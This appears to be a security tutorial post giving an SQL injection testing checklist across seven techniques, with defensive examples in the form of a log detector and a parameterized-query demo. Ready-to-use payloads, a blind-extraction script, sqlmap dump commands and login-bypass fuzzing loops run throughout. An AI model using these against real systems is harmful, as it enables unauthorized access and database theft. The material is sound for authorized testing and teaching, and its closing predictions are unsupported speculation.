
Introduction:
SQL injection (SQLi) remains the top critical vulnerability in OWASP Top 10, allowing attackers to bypass authentication, exfiltrate databases, and compromise entire web applications. This checklist transforms raw testing methodologies into actionable, step-by-step techniques used by professional penetration testers and bug bounty hunters on platforms like HackerOne and Bugcrowd.
Learning Objectives:
– Master seven distinct SQL injection testing methodologies from error-based to second-order attacks
– Apply manual and automated payloads across GET, POST, headers, cookies, and modern API formats (JSON/GraphQL)
– Execute practical Linux/Windows commands to detect, exploit, and mitigate SQLi vulnerabilities in real-world web applications
You Should Know:
1. Input Discovery & Parameter Mapping – The Foundation of SQLi Testing
Start by enumerating every possible injection point. Modern applications hide parameters in unexpected locations.
Step‑by‑step guide:
– GET parameters: Intercept all URL query strings, including sorting (`?sort=name`), pagination (`?page=2`), filters (`?category=books`), and hidden parameters revealed via JS files.
– POST parameters: Test login, registration, password reset, contact, and payment forms. Use Burp Suite’s “Discover Content” or `ffuf` to brute‑force parameter names.
– HTTP headers & cookies: Inject into `User-Agent`, `Referer`, `X-Forwarded-For`, `X-Client-IP`, `Cookie`, and `Host`.
– Modern APIs: For JSON, add `"test": "'"` inside the body; for GraphQL, inject into arguments like `{user(id: "1'") {name}}`; for WebSockets, tamper with messages before they are sent.
Linux / Windows commands:
# Linux – enumerate hidden parameters with ffuf
ffuf -u 'https://target.com/page?FUZZ=value' -w /usr/share/wordlists/param.txt -fs 1234
# Windows PowerShell – send test payloads via Invoke-RestMethod
Invoke-RestMethod -Uri "https://target.com/search?q=test'" -Method Get
Tool config (Burp Suite): Enable “Param Miner” extension to guess hidden parameters and “Logger++” to track all injected requests.
2. Error-Based SQL Injection – Exploiting Database Errors
When an application returns database errors (e.g., “You have an error in your SQL syntax”), you can directly extract information.
Step‑by‑step guide:
1. Inject a single quote `'` into any input. Observe the error message to fingerprint the database (MySQL: `You have an error in your SQL syntax`, MSSQL: `Unclosed quotation mark`, PostgreSQL: `syntax error at or near "'"`).
2. Chain conditions into the payload: `' OR 1=1--` and `' AND 1=CONVERT(int, @@version)--` (MSSQL).
3. For MySQL, extract the version with: `' AND extractvalue(1, concat(0x7e, version()))--` (the value is leaked through the XPath error message).
4. Automate with SQLmap: `sqlmap -u "https://target.com/page?id=1" --dbms=MySQL --level=3 --risk=2`
Commands:
# Manual curl to trigger error
curl "https://target.com/product?id=1'" --proxy http://127.0.0.1:8080
# SQLmap fingerprinting
sqlmap -u "https://target.com/login" --data "user=admin&pass=test" --dbms=PostgreSQL --banner
Mitigation: Use parameterized queries (prepared statements) and disable verbose database error messages in production.
3. Boolean-Based Blind SQL Injection – Inferring Data Bit by Bit
When no errors are shown, but the page changes (content length, status code, redirects) based on true/false conditions, use boolean inference.
Step‑by‑step guide:
1. Establish a baseline: `' AND 1=1--` (should return the normal page). `' AND 1=2--` (should return an altered or empty page).
2. Extract data character by character using substring: `' AND SUBSTRING((SELECT database()),1,1)='a'--`.
3. For MySQL: `' AND (SELECT ascii(substring(database(),1,1)) FROM dual) > 100--`.
4. Automate with `sqlmap --technique=B` or write a Python script with the `requests` library.
Example Python script for blind boolean:
import requests

url = "https://target.com/search"  # injection point is the q parameter
# Binary-search the ASCII code of one character of database() per position.
# The trailing space after "--" is required for the MySQL comment to take effect.
payload_template = "' AND (SELECT ascii(substring(database(),{},1)) FROM dual) > {}-- "
data = ""
for pos in range(1, 20):
    # Range starts at 0 so that ascii() returning 0 (past the end of the string) is detectable.
    low, high = 0, 126
    while low <= high:
        mid = (low + high) // 2
        payload = payload_template.format(pos, mid)
        r = requests.get(url, params={"q": payload})  # requests URL-encodes the payload
        if "Welcome" in r.text:   # true condition: ascii(char) > mid
            low = mid + 1
        else:                     # false condition: ascii(char) <= mid
            high = mid - 1
    if low == 0:                  # ascii() was 0: end of the database name
        break
    data += chr(low)              # the search converges with low == ascii(char)
print(data)
Windows PowerShell alternative: Use `Invoke-WebRequest` and compare response lengths.
4. Time-Based Blind SQL Injection – Delaying Responses to Infer Truth
When no visual difference exists, use database sleep functions. A time delay indicates a true condition.
Step‑by‑step guide:
1. MySQL: `' AND SLEEP(5)--` (waits 5 seconds if true). PostgreSQL: `' AND pg_sleep(5)--`. MSSQL: `' WAITFOR DELAY '0:0:5'--`.
2. Combine with conditional logic: `' AND IF(1=1, SLEEP(5), 0)--` (MySQL).
3. For JSON parameters: `{"user":"admin' AND SLEEP(5)--"}`.
4. Monitor response time using Burp Repeater’s “Render” tab or a custom script.
Linux command with `time`:
time curl -X POST "https://target.com/login" -d "user=admin' AND SLEEP(5)--&pass=anything"
SQLmap time‑based: `sqlmap -u "https://target.com/page?id=1" --technique=T --time-sec=5`
Hardening: Use query timeouts (e.g., `statement_timeout` in PostgreSQL) and Web Application Firewall (WAF) rules to detect excessive sleep patterns.
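The detection half of that hardening note, as an added example that is not part of the original post: it scans constructed access-log lines (the `METHOD TARGET STATUS RESPONSE_TIME_MS` format and the 3000 ms threshold are assumptions) and only raises an alert when a delay primitive from the checklist is present and the response actually took that long.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Assumed format:
# METHOD TARGET STATUS RESPONSE_TIME_MS, with the query string or form body URL-encoded.
SAMPLE_LOG = """\
GET /login?user=alice 200 45
POST /login user=admin'%20AND%20SLEEP(5)--&pass=anything 200 5120
GET /page?id=1 200 38
GET /page?id=1'%20AND%20IF(1=1,SLEEP(5),0)-- 200 5087
GET /report?range=monthly 200 4900
POST /login user=admin'%20AND%20pg_sleep(5)-- 500 120
"""

# The delay primitives named in the checklist: MySQL SLEEP(), PostgreSQL pg_sleep(),
# MSSQL WAITFOR DELAY. Matching runs on the decoded request, so %20 encoding does not hide them.
SLEEP_RE = re.compile(r"\b(sleep\s*\(|pg_sleep\s*\(|waitfor\s+delay)", re.IGNORECASE)

def classify(line, slow_ms=3000):
    """Label one log line. slow_ms is an assumed threshold: derive it from the
    endpoint's normal latency, well below the 5 s the payloads ask for."""
    request, status, ms = line.rsplit(None, 2)
    has_sleep = bool(SLEEP_RE.search(unquote_plus(request)))
    slow = int(ms) >= slow_ms
    if has_sleep and slow:
        return "alert"    # delay primitive present and the delay really happened
    if has_sleep:
        return "suspect"  # probe seen but no delay: blocked, wrong dialect, or not injectable
    if slow:
        return "slow"     # latency alone is not evidence of injection
    return "ok"

def scan(log_text):
    """Return (label, line) pairs for every non-empty line."""
    return [(classify(l), l) for l in log_text.splitlines() if l.strip()]

if __name__ == "__main__":
    for label, line in scan(SAMPLE_LOG):
        print(f"{label:8s} {line}")
```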
5. UNION-Based SQL Injection – Combining Queries for Data Exfiltration
UNION injections let you append a second `SELECT` to retrieve arbitrary data from other tables.
Step‑by‑step guide:
1. Enumerate the column count using `ORDER BY`: `' ORDER BY 1--`, then `' ORDER BY 2--`, and so on until an error occurs.
2. Find columns that accept string data: `' UNION SELECT NULL,NULL--`; replace each `NULL` with `'a'` in turn.
3. Extract version, database, user: `' UNION SELECT @@version, database(), user()--` (MySQL).
4. Enumerate tables: `' UNION SELECT table_name, column_name FROM information_schema.columns--`.
5. For MSSQL, use `' UNION SELECT name FROM sys.databases--`.
Manual payload example:
' UNION SELECT group_concat(table_name), 2 FROM information_schema.tables WHERE table_schema=database()--
Automation: SQLmap's `--union-check` and `--union-cols` flags.
Linux one‑liner (using `sqlmap`):
sqlmap -u "https://target.com/product?id=1" --union --columns -T users -D database_name --dump
6. Authentication Bypass – Logging in Without Credentials
SQLi in login fields can completely bypass authentication.
Step‑by‑step guide:
1. Username field: `admin'--` (comments out the password check). Password field: anything.
2. Universal payload: `' OR '1'='1'--` in both fields.
3. Bypass JSON login: `{"username":{"$ne":null},"password":{"$ne":null}}` (NoSQL injection, but often combined).
4. Test MFA enrollment: inject `' OR 1=1--` into verification code fields – may skip OTP validation.
5. Password reset workflow: inject into the reset token parameter (e.g., `token=123' OR '1'='1'--`) to reset any account.
Windows / Linux – automate bypass fuzzing:
# Using wfuzz (Linux)
wfuzz -z file,/usr/share/seclists/Fuzzing/SQLi/auth_bypass.txt -d "user=FUZZ&pass=test" https://target.com/login
# PowerShell example
$payloads = @("admin'--", "' OR '1'='1", "admin' OR 1=1--")
foreach ($p in $payloads) {
    Invoke-WebRequest -Uri "https://target.com/login" -Method Post -Body "username=$p&password=x"
}
Mitigation: Always use parameterized queries for authentication; never concatenate user input into SQL. Implement account lockout and rate limiting.
7. Second-Order SQL Injection – The Stored Attack
A payload is stored safely (e.g., registration with username `admin'--`) but later used unsafely in another SQL query (e.g., password reset lookup). This bypasses naive input filters.
Step‑by‑step guide:
1. Stored input vectors: username, email, company name, shipping address, notes, profile bio.
2. Register a user with the payload `test' OR '1'='1` as the email address.
3. Trigger a vulnerable function that later queries that stored value – e.g., "Forgot password" looks up the user by email: `SELECT * FROM users WHERE email='test' OR '1'='1'` – which returns all users.
4. Extract data: if the app displays a list of users (admin panel), you can pivot.
5. Test with `sleep()` payloads: register `test' AND SLEEP(5)--` and then access a profile page that uses that username in a second query.
Manual test example (registration to password reset):
POST /register HTTP/1.1
...
username=attacker&email=hacker' OR SLEEP(5)--&password=pass

# Later, trigger password reset
POST /reset
...
email=hacker' OR SLEEP(5)--
Detection tool: Use `sqlmap` with the `--second-order` flag pointing to the vulnerable endpoint.
Cloud hardening: Implement prepared statements globally; use stored procedure validation; audit all places where stored data is concatenated into queries.
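To make the mitigation notes of sections 6 and 7 concrete, here is an added Python example against an in-memory SQLite database; it is not code from the original post, and the accounts it creates are constructed. It runs the page's own `admin'--` and `test' OR '1'='1` payloads through a concatenated query and its parameterized counterpart, and shows that a second-order payload stored safely by a parameterized INSERT still fires wherever the stored value is later concatenated.

```python
import sqlite3

def setup():
    """In-memory SQLite fixture with two constructed accounts (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, email, password) VALUES (?, ?, ?)",
                   [("admin", "admin@example.com", "s3cret"), ("bob", "bob@example.com", "hunter2")])
    return db

# Section 6: login. The vulnerable form assembles the statement as text, so
# admin'-- closes the username literal and comments out the password check.
def login_concat(db, username, password):
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    return [row[0] for row in db.execute(sql)]

def login_param(db, username, password):
    # Hardened: the statement shape is fixed; both inputs travel as bound values.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password))]

# Section 7: second order. Registration is already parameterized, so the payload
# is stored verbatim and harmlessly; filtering input here would not help, because
# the damage happens where the stored value is concatenated later.
def register(db, username, email):
    db.execute("INSERT INTO users (username, email, password) VALUES (?, ?, ?)",
               (username, email, "unused"))

def reset_lookup_concat(db, email):
    # Vulnerable sink: trusts the value because it "came from our own database".
    return [row[0] for row in db.execute(f"SELECT username FROM users WHERE email='{email}'")]

def reset_lookup_param(db, email):
    return [row[0] for row in db.execute("SELECT username FROM users WHERE email=?", (email,))]

if __name__ == "__main__":
    db = setup()
    print(login_concat(db, "admin'--", "wrong"))       # ['admin']: bypass succeeds
    print(login_param(db, "admin'--", "wrong"))        # []: bypass fails
    register(db, "mallory", "test' OR '1'='1")
    print(reset_lookup_concat(db, "test' OR '1'='1"))  # every user is returned
    print(reset_lookup_param(db, "test' OR '1'='1"))   # ['mallory']
```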
What Undercode Say:
– Key Takeaway 1: Manual testing still outperforms automation in blind and second-order SQLi – understanding boolean/time inference gives you an edge over script‑kiddies.
– Key Takeaway 2: Modern APIs (GraphQL, JSON, WebSockets) are often overlooked; always expand your input discovery beyond classic GET/POST to uncover critical vulnerabilities.
Analysis (10 lines): The checklist bridges the gap between theory and practice by categorizing SQLi into distinct testable patterns. Error‑based remains the fastest win, but blind techniques are where real skill shines – especially with time‑based delays that evade WAFs. Authentication bypass via SQLi continues to plague enterprises because developers trust front‑end validation. Second‑order attacks are the most devastating because they survive sanitization attempts; they require deep understanding of application workflows. The rise of headless APIs and microservices introduces new injection surfaces (e.g., `X-Forwarded-For` logged and later queried). Linux/Windows commands provided enable testers to script reconnaissance without heavy tools. Future SQLi mitigation will pivot toward AI‑driven anomaly detection, but as long as legacy code uses dynamic queries, the vulnerability persists. Bug bounty hunters who master this checklist will consistently find high‑severity reports, especially on HackerOne’s VDP programs. Ultimately, the best defense is developer education and mandatory parameterized queries in CI/CD pipelines.
Prediction:
– +1 Enterprises will increasingly adopt ORM frameworks with built‑in query parameterization, reducing classic SQLi by 60% by 2027.
– -1 Legacy internal applications and IoT backends will remain vulnerable, with second‑order SQLi becoming the #1 attack vector in hybrid cloud environments.
– +1 AI‑powered WAFs using LLMs to parse SQL semantics will emerge, but attackers will shift to time‑based payloads that mimic legitimate latency.
– -1 The rise of GraphQL and serverless databases (e.g., DynamoDB) introduces new injection dialects; most security scanners lack coverage, creating a “blind spot” for bug bounty hunters to exploit for the next 2‑3 years.
IT/Security Reporter URL:
Reported By: [Deepmarketer Sql](https://www.linkedin.com/posts/deepmarketer_sql-injection-testing-checklist-ugcPost-7469197411542814721-Zw1u/) – Hackers Feeds